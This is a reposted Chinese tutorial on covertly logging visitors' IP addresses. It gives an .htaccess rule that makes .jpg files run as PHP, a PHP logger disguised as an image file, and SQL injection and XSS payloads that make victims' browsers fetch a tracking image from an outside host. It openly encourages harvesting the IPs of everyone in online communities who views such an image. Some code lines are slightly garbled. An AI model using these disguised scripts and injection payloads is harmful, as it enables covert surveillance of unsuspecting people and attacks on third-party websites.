0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

如何通过一张照片来获取ip地址?

dyquk4xk2p3d 来源:良许Linux 作者:良许Linux 2022-12-14 10:31 次阅读
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群


	

在本教程中,我们将学习如何用一张照片来盗取ip地址。我的想法是通过修改.htaccess文件,将jpg文件当作php文件来解析。

下面就是我们需要向.htaccess中添加的代码:

AddHandlerapplication/x-httpd-php5.jpg

然后将下面的代码复制到记事本中,命名为grabber.jpg


$fh=fopen('ip_list.txt','a');
fwrite($fh,$_SERVER['REMOTE_ADDR']."
");
fclose($fh);
$im=imagecreatefromjpeg("n00b.png");
header('Content-Type:image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>

将grabber.jpg的权限设置为755,然后再找一张照片,将其命名为n00b.png,接着放到与grabber.jpg相同的目录之中。

就这样,一切工作就绪了。当别人浏览grabber.jpg这张照片的时候,他的ip地址就会被记录下来。

(译者注:需要把这些东西上传至我们的个人网站空间中)

POC:

(译者注:作者这里贴了一张可获取ip的演示照片,为了大家的隐私,我没有将其贴出,读者可自行去作者博客查看)

至此,我们的照片已经可以开始工作了。

接着我还想说明一下如何使用SQLi来获取ip地址。其实使用照片来盗取ip地址十分快捷,我们没有理由去使用SQLi这种方法,但是为了让读者获取到更多的知识,我还是说明一下吧:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'unionselect1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#

现在,再说一下如何使用xss来获取ip地址:

http://leettime.net/xsslab1/chalg1.php?name=<imgsrc="http://leettime.net/idiots_test_lab/imageip/tryme.jpg">&submit=Search

好了,就是这些了。

我们可以用这个技巧做许多有趣的事情,事实上大部分社区都允许我们发布一些照片,所以我们可以用这个方法去获取所有访问到我们照片的人的ip地址。

审核编辑 :李倩


声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • IP
    IP
    +关注

    关注

    5

    文章

    1849

    浏览量

    154890
  • 代码
    +关注

    关注

    30

    文章

    4940

    浏览量

    73116

原文标题:如何通过一张照片来获取ip地址?

文章出处:【微信号:良许Linux,微信公众号:良许Linux】欢迎添加关注!文章转载请注明出处。

收藏 人收藏
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

    评论

    相关推荐
    热点推荐

    一张照片实现唱跳+对口型?千问App新玩法!

    行业资讯
    脑极体
    发布于 :2025年12月02日 22:06:44

    城市一张网,以数据之桥擎托未来

    以“城市一张网”为基石,打造可信数据空间,赋能全域数字化转型
    的头像 发表于 10-14 09:29 1762次阅读
    城市<b class='flag-5'>一张</b>网,以数据之桥擎托未来

    一张图搞懂LDO的硬件设计和应用

    存在误解,这些误解往往会导致设计失败。  ” 我们先通过一张概括 LDO 的应用: 线性稳压电源与 LDO 先澄清个基础的概念 : LDO 是线性稳压电源的
    的头像 发表于 09-23 17:22 7917次阅读
    <b class='flag-5'>一张</b>图搞懂LDO的硬件设计和应用

    CNC的IP地址相同冲突如何解决?

    在网络世界中,每个设备都需要个独特的标识确保信息的准确传输,这个标识就是IP地址。然而,在CNC(数控机床)生产车间中,由于存在多个品牌、不同型号的设备,且这些设备在出厂测试时往往
    的头像 发表于 07-23 14:13 437次阅读
    CNC的<b class='flag-5'>IP</b><b class='flag-5'>地址</b>相同冲突如何解决?

    从零开始学IP地址

    IP地址种网络编码,用来唯标识网络中的设备,以确保主机间正常通信。IP地址由32位二进制(
    的头像 发表于 07-08 09:29 1401次阅读
    从零开始学<b class='flag-5'>IP</b><b class='flag-5'>地址</b>

    DLP3010+DLPC3478开机是一张splah图片,是否可以通过更改固件让开机就进入internal pattern mode进行投图呢?

    DLP3010+DLPC3478目前开机是一张splah图片,是否可以通过更改固件让开机就进入internal pattern mode 进行投图呢,同时trigger也默认配置。 因为DLP4500通过更改ini文件是可
    发表于 02-26 07:49

    用DLP4500烧录98bit位深度的相移图,3合成了一张24bit,结果每一张24bit都重复投射三次,这是为什么?

    你好,吴工,用DLP4500烧录98bit位深度的相移图,3合成了一张24bit,结果每一张24bit都重复投射三次,想问下这是为什么?(我使用的是之前发的那个VS2010版本的
    发表于 02-24 08:00

    DLP4710一张张加载图片显示这个速度是否能够更改?

    工程师您好,DMD一张张加载图片显示这个速度是否能够更改?在DMD上加载图片显示目前只能6帧/s。如果需要提高速度应该从哪里去考虑?谢谢回答。
    发表于 02-21 12:12

    ISP与IP地址

    ISP可以为用户提供互联网接入、信息内容、应用服务以及其他增值业务。 要知道,在ISP的网络中,IP地址池几乎可以说不可或缺。IP地址池是指
    的头像 发表于 12-27 10:41 906次阅读

    CIDR的IP地址分配与管理

    传统IP地址分类,也就是ABC类等。但是,有种情况,“如果个公司可能被分配了个C类网络地址
    的头像 发表于 12-26 10:01 934次阅读

    IP地址数据信息和爬虫拦截的关联

    多样的数据,那么我们应该怎么利用IP地址信息对爬虫行为进行识别呢? 访问频率异常的大概率是爬虫行为 正常用户访问:浏览网站时,操作速度会受到人类行为习惯的限制,通常会在页面上停留
    的头像 发表于 12-23 10:13 669次阅读

    IP地址伪造和反伪造技术

    IP地址伪造简而言之就是网络攻击的种手段。攻击者通过伪装成合法的IP地址,绕过访问控制、进行恶
    的头像 发表于 12-20 10:12 975次阅读

    通过安卓手机查找IP地址步骤

    我们在使用安卓手机的时候,可以在设备上通过些方法查到IP地址,而IP
    的头像 发表于 12-12 13:53 4481次阅读
    <b class='flag-5'>通过</b>安卓手机查找<b class='flag-5'>IP</b><b class='flag-5'>地址</b>步骤

    USB3.0 工业相机的传输速率是否受到电脑主板某些硬件的限制?

    设置为500FPS,对应2ms采集一张照片。 ② 电脑为具有4个USB3.0接口的电脑(台式机或者笔记本),目前的测试机为联想拯救者(Ryzen5800H,16GB内存,512GB PCI-E 3.0
    发表于 12-08 21:20

    文分清IP地址、子网和子网掩码的关系

    为什么配置IPv4地址时要配置子网掩码,这不得不说IP地址、子网和子网掩码的关系。   子网掩码和IP地址
    的头像 发表于 12-07 10:20 4779次阅读
    <b class='flag-5'>一</b>文分清<b class='flag-5'>IP</b><b class='flag-5'>地址</b>、子网和子网掩码的关系